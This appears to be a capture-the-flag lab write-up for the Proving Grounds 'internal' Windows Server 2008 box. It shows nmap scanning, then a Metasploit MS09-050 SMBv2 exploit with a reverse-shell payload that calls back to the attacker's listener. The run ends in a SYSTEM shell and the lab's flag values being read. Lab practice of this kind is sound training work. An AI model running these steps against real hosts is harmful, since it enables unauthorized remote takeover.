No credentials were provided for this machine

nmap -vvv -T5 -Pn 192.168.192.40 -p- -A -oN nmap.txt

sudo echo "192.168.192.40 internal.offsec" | sudo tee -a /etc/hosts

445/tcp   open  microsoft-ds  syn-ack ttl 125 Windows Server (R) 2008 Standard 6001 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)

nmap -vvv -T5 -Pn 192.168.192.40 -p445 --script vuln -A -oN 445_vuln_nmap.txt

Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-cve2009-3103: 
|   VULNERABLE:
|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)

i tried this one, but doesnt work i dont know why
https://www.exploit-db.com/exploits/40280

so i used msfconsole like mentionned in the lab

┌──(lepotekil㉿kali)-[~/proving-ground-prac/internal]
└─$ msfconsole                                                                                                  
Metasploit tip: Enable verbose logging with set VERBOSE true
/usr/share/metasploit-framework/lib/rex/proto/ldap.rb:13: warning: already initialized constant Net::LDAP::WhoamiOid
/usr/share/metasploit-framework/vendor/bundle/ruby/3.3.0/gems/net-ldap-0.20.0/lib/net/ldap.rb:344: warning: previous definition of WhoamiOid was here
                                                  
                                   ____________
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a,        |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a,     |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%|       `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]
 [% .--------..-----.|  |_ .---.-.|       .,a$%|.-----.|  |.-----.|__||  |_ %%]
 [% |        ||  -__||   _||  _  ||  ,,aS$""`  ||  _  ||  ||  _  ||  ||   _|%%]
 [% |__|__|__||_____||____||___._||%$P"`       ||   __||__||_____||__||____|%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a,       ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%        `"$   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]


       =[ metasploit v6.4.94-dev                                ]
+ -- --=[ 2,562 exploits - 1,315 auxiliary - 1,680 payloads     ]
+ -- --=[ 431 post - 49 encoders - 13 nops - 9 evasion          ]

Metasploit Documentation: https://docs.metasploit.com/
The Metasploit Framework is a Rapid7 Open Source Project

msf > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > set rhosts internal.offsec
rhosts => internal.offsec
msf exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > check
[-] This module does not support check.
msf exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > set payload windows/shell_reverse_tcp 
payload => windows/shell_reverse_tcp
msf exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > set lhost 192.168.45.170
lhost => 192.168.45.170
msf exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > set lport 445
lport => 445
msf exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > exploit 
[*] Started reverse TCP handler on 192.168.45.170:445 
[*] 192.168.192.40:445 - Connecting to the target (192.168.192.40:445)...
[*] 192.168.192.40:445 - Sending the exploit packet (900 bytes)...
[*] 192.168.192.40:445 - Waiting up to 180 seconds for exploit to trigger...
[*] Command shell session 1 opened (192.168.45.170:445 -> 192.168.192.40:49159) at 2025-10-22 11:13:43 -0400


Shell Banner:
Microsoft Windows [Version 6.0.6001]
-----
          

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>cd C:\Users\Administrator\desktop
cd C:\Users\Administrator\desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is B863-254D

 Directory of C:\Users\Administrator\Desktop

02/03/2011  08:51 PM    <DIR>          .
02/03/2011  08:51 PM    <DIR>          ..
05/20/2016  10:26 PM                32 network-secret.txt
10/22/2025  08:05 AM                34 proof.txt
               2 File(s)             66 bytes
               2 Dir(s)   4,111,011,840 bytes free

C:\Users\Administrator\Desktop>type proof.txt
type proof.txt
06977b50ab4c94aec60e7521dd06a254

C:\Users\Administrator\Desktop>type network-secret.txt
type network-secret.txt
9be35de7610eb55b8c1aeb6e18bf4c9f